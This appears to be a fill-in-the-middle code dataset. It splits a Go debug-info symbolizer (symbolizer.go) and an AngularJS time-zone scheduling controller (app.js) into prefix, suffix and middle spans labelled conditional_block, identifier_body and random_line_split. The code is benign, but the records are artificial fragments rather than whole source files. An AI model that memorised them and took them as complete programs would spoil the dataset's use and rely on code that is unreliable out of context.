return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes it the
// given location.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempt to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) countLocationsToSymbolize(key string, locations []*pb.Location) int {
locationsToSymbolize := 0
for _, loc := range locations {
if _, failedBefore := s.symbolizationFailed[key][loc.Address]; failedBefore {
continue
}
pcRange, found := s.pcRanges[key]
if !found | {
locationsToSymbolize++
continue
} | conditional_block |
|
symbolizer.go |
func WithDemangleMode(mode string) Option {
return func(s *Symbolizer) {
s.demangler = demangle.NewDemangler(mode, false)
}
}
type Symbolizer struct {
logger log.Logger
// attempts counts the total number of symbolication attempts.
// It counts per batch.
attempts prometheus.Counter
// errors counts the total number of symbolication errors, partitioned by an error reason
// such as failure to fetch unsymbolized locations.
// It counts per batch.
errors *prometheus.CounterVec
// duration is a histogram to measure how long it takes to finish a symbolication round.
// Note, a single observation is per batch.
duration prometheus.Histogram
// storeDuration is a histogram to measure how long it takes to store the symbolized locations.
// Note, a single observation is per batch.
storeDuration prometheus.Histogram
metastore pb.MetastoreServiceClient
debuginfo DebuginfoFetcher
metadata DebuginfoMetadata
demangler *demangle.Demangler
attemptThreshold int
linerCreationFailed map[string]struct{}
symbolizationAttempts map[string]map[uint64]int
symbolizationFailed map[string]map[uint64]struct{}
pcRanges map[string][2]uint64
linerCache map[string]liner
batchSize uint32
tmpDir string
}
type DebuginfoFetcher interface {
// Fetch ensures that the debug info for the given build ID is available on
// a local filesystem and returns a path to it.
FetchDebuginfo(ctx context.Context, dbginfo *debuginfopb.Debuginfo) (io.ReadCloser, error)
}
func New(
logger log.Logger,
reg prometheus.Registerer,
metadata DebuginfoMetadata,
metastore pb.MetastoreServiceClient,
debuginfo DebuginfoFetcher,
tmpDir string,
batchSize uint32,
opts ...Option,
) *Symbolizer {
attemptsTotal := promauto.With(reg).NewCounter(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_attempts_total",
Help: "Total number of symbolication attempts in batches.",
},
)
errorsTotal := promauto.With(reg).NewCounterVec(
prometheus.CounterOpts{
Name: "parca_symbolizer_symbolication_errors_total",
Help: "Total number of symbolication errors in batches, partitioned by an error reason.",
},
[]string{"reason"},
)
duration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_symbolication_duration_seconds",
Help: "How long it took in seconds to finish a round of the symbolication cycle in batches.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
storeDuration := promauto.With(reg).NewHistogram(
prometheus.HistogramOpts{
Name: "parca_symbolizer_store_duration_seconds",
Help: "How long it took in seconds to store a batch of the symbolized locations.",
Buckets: []float64{0.001, 0.01, 0.1, 0.3, 0.6, 1, 3, 6, 9, 20, 30, 60, 90, 120},
},
)
const (
defaultDemangleMode = "simple"
defaultAttemptThreshold = 3
)
s := &Symbolizer{
logger: log.With(logger, "component", "symbolizer"),
attempts: attemptsTotal,
errors: errorsTotal,
duration: duration,
storeDuration: storeDuration,
metastore: metastore,
debuginfo: debuginfo,
tmpDir: tmpDir,
batchSize: batchSize,
metadata: metadata,
demangler: demangle.NewDemangler(defaultDemangleMode, false),
attemptThreshold: defaultAttemptThreshold,
linerCreationFailed: map[string]struct{}{},
symbolizationAttempts: map[string]map[uint64]int{},
symbolizationFailed: map[string]map[uint64]struct{}{},
pcRanges: map[string][2]uint64{},
}
for _, opt := range opts {
opt(s)
}
return s
}
func (s *Symbolizer) Run(ctx context.Context, interval time.Duration) error {
return runutil.Repeat(interval, ctx.Done(), func() error {
level.Debug(s.logger).Log("msg", "start symbolization cycle")
s.runSymbolizationCycle(ctx)
level.Debug(s.logger).Log("msg", "symbolization loop completed")
return nil
})
}
func (s *Symbolizer) runSymbolizationCycle(ctx context.Context) {
var begin time.Time
prevMaxKey := ""
for {
begin = time.Now()
s.attempts.Inc()
lres, err := s.metastore.UnsymbolizedLocations(ctx, &pb.UnsymbolizedLocationsRequest{
Limit: s.batchSize,
MinKey: prevMaxKey,
})
if err != nil {
level.Error(s.logger).Log("msg", "failed to fetch unsymbolized locations", "err", err)
s.errors.WithLabelValues("fetch_unsymbolized_locations").Inc()
s.duration.Observe(time.Since(begin).Seconds())
// Try again on the next cycle.
return
}
if len(lres.Locations) == 0 {
s.duration.Observe(time.Since(begin).Seconds())
// Nothing to symbolize.
return
}
prevMaxKey = lres.MaxKey
err = s.Symbolize(ctx, lres.Locations)
if err != nil {
level.Debug(s.logger).Log("msg", "errors occurred during symbolization", "err", err)
}
s.duration.Observe(time.Since(begin).Seconds())
if s.batchSize == 0 {
// If batch size is 0 we won't continue with the next batch as we
// should have already processed everything.
return
}
}
}
// UnsymbolizableMapping returns true if a mapping points to a binary for which
// locations can't be symbolized in principle, at least now. Examples are
// "[vdso]", [vsyscall]" and some others, see the code.
func UnsymbolizableMapping(m *pb.Mapping) bool {
name := filepath.Base(m.File)
return strings.HasPrefix(name, "[") || strings.HasPrefix(name, "linux-vdso") || strings.HasPrefix(m.File, "/dev/dri/")
}
type MappingLocations struct {
Mapping *pb.Mapping
Locations []*pb.Location
// LocationsLines is a list of lines per location.
LocationsLines [][]profile.LocationLine
}
func (s *Symbolizer) Symbolize(ctx context.Context, locations []*pb.Location) error {
mappingsIndex := map[string]int{}
mappingIDs := []string{}
for _, loc := range locations {
if _, ok := mappingsIndex[loc.MappingId]; !ok {
mappingIDs = append(mappingIDs, loc.MappingId)
mappingsIndex[loc.MappingId] = len(mappingIDs) - 1
}
}
mres, err := s.metastore.Mappings(ctx, &pb.MappingsRequest{MappingIds: mappingIDs})
if err != nil {
s.errors.WithLabelValues("get_mappings").Inc()
return fmt.Errorf("get mappings: %w", err)
}
// Aggregate locations per mapping to get prepared for batch request.
locationsByMappings := make([]*MappingLocations, len(mres.Mappings))
for i, m := range mres.Mappings {
locationsByMappings[i] = &MappingLocations{Mapping: m}
}
for _, loc := range locations {
locationsByMapping := locationsByMappings[mappingsIndex[loc.MappingId]]
// Already symbolized!
if loc.Lines != nil && len(loc.Lines) > 0 {
level.Debug(s.logger).Log("msg", "location already symbolized, skipping")
continue
}
locationsByMapping.Locations = append(locationsByMapping.Locations, loc)
}
newLinerCache := map[string]liner{}
for _, locationsByMapping := range locationsByMappings {
mapping := locationsByMapping.Mapping
// If Mapping or Mapping.BuildID is empty, we cannot associate an object file with functions.
if mapping == nil || len(mapping.BuildId) == 0 || UnsymbolizableMapping(mapping) {
level.Debug(s.logger).Log("msg", "mapping of location is empty, skipping")
continue
}
logger := log.With(s.logger, "buildid", mapping.BuildId)
var liner liner
locations := locationsByMapping.Locations
// Symbolize returns a list of lines per location passed to it.
locationsByMapping.LocationsLines, liner, err = s.symbolizeLocationsForMapping(ctx, mapping, locations)
if err != nil {
level.Debug(logger).Log("msg", "storage symbol | {
return func(s *Symbolizer) {
s.attemptThreshold = t
}
} | identifier_body |
|
app.js | SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel; | }
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.z | random_line_split |
|
app.js |
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i | {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
} | identifier_body |
|
app.js | InputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
